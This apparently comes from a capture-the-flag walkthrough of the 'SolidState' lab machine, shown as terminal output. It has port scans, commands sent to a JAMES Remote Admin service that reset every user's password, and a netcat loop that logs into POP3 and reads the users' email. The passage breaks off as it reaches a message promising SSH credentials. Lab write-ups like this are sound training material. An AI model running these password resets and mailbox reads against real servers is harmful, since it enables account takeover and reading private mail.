➜ ~ sudo masscan -p0-65535 --max-rate 1000 10.10.10.51 [sudo] password for miao: Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-03-14 20:35:04 GMT Initiating SYN Stealth Scan Scanning 1 hosts [65536 ports/host] Discovered open port 25/tcp on 10.10.10.51 Discovered open port 110/tcp on 10.10.10.51 Discovered open port 4555/tcp on 10.10.10.51 Discovered open port 80/tcp on 10.10.10.51 Discovered open port 22/tcp on 10.10.10.51 Discovered open port 119/tcp on 10.10.10.51
$ nmap -sC -sV -p22,25,80,110,119,4555 10.10.10.51 Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-16 13:22 CST Nmap scan report for 10.10.10.51 Host is up (0.067s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA) | 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA) |_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519) 25/tcp open smtp JAMES smtpd 2.3.2 |_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.4 [10.10.14.4]), 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Home - Solid State Security 110/tcp open pop3 JAMES pop3d 2.3.2 119/tcp open nntp JAMES nntpd (posting ok) 4555/tcp open james-admin JAMES Remote Admin 2.3.2 Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.63 seconds
setpassword james abcd setpassword thomas abcd setpassword john abcd setpassword mindy abcd setpassword mailadmin abcd quit
for user in james john thomas mindy mailadmin; do ( echo USER ${user}; sleep 2s; echo PASS abcd; sleep 2s; echo LIST; sleep 2s; echo quit) | nc -nvC 10.10.10.51 110; done
$ ncat -nvC 10.10.10.51 110 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Connected to 10.10.10.51:110. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER mindy +OK PASS abcd +OK Welcome mindy LIST +OK 2 1945 1 1109 2 836 . REPR 1 -ERR RETR 1 +OK Message follows Return-Path: <mailadmin@localhost> Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: mindy@localhost Received: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798 for <mindy@localhost>; Tue, 22 Aug 2017 13:13:42 -0400 (EDT) Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT) From: mailadmin@localhost Subject: Welcome
Dear Mindy, Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully, James . RETR 2 +OK Message follows Return-Path: <mailadmin@localhost> Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: mindy@localhost Received: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581 for <mindy@localhost>; Tue, 22 Aug 2017 13:17:28 -0400 (EDT) Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT) From: mailadmin@localhost Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login. Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
